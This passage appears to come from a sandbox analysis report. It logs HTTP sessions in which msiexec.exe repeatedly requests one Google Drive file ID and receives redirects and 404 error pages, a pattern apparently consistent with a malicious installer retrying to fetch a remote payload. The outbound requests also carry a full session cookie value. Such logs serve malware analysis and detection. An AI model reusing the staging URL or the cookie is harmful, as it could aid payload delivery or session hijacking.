2025-01-11 03:27:39 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6b 39 78 39 46 42 35 50 30 79 69 7a 68 49 6f 5f 76 42 6b 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Qk9x9FB5P0yizhIo_vBkLA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.11	50015	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:39 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:40 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-UURDnNt8hTvijtIup_mrpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.11	50016	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:40 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:41 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSaU1zR7x_jyOQOg7yUUp4Pe0wxX0lN8DNMZKnZZng-ypQr_orzOSh0sa-INFda2dIskYn46OQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:41 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-kWSbCkBuvMyrfOd-mR33MQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:41 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 55 5f 71 74 31 64 53 42 58 39 66 52 4f 77 47 6c 6f 2d 62 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gU_qt1dSBX9fROwGlo-bpg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.11	50017	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:42 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:42 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:42 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-VxoCH2QyFYRzkgJpvIrWxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.11	50018	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:43 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:43 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSPu2wOKjs9eJSKa8hFxUgC8-A3QA7fTfU11WXzoLsRM0kbdRQuCAB49KG8i7NVkd2p Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:43 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-5NUCwXUAOXaI8nvxWA8FMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:43 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 33 51 49 35 50 79 49 41 45 43 6a 74 75 50 32 71 38 44 51 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="I3QI5PyIAECjtuP2q8DQdw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.11	50019	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:44 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:44 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:44 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-xODaQPkf6S2F6F-0HiI_-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.11	50020	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:45 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:45 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQrhTaPy6bBY-EkXWc0zz2q7MoGQhI23JGvSVuQt7T1nmJU4XDJolUZHjnbSp6AlBkrd-dfgQE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:45 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-31KNQ2Ly-uzc3hEO2ANNvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:45 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 31 32 58 59 51 4d 52 6e 77 34 53 67 64 68 49 6d 35 68 38 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S12XYQMRnw4SgdhIm5h8yg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.11	50021	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:46 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:47 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:46 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-GxRdi_4ecogMkE3NFh5m8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.11	50022	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:47 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:48 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQxf1WGEN1wlHWPrniMlnu8u_A9hBEWZj4hK4735-17eU8RfAvEzkz032GAxDcYc4Uzg-rDq1U Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:48 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-BJkaS_hpz-hiLYcdBg9zyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
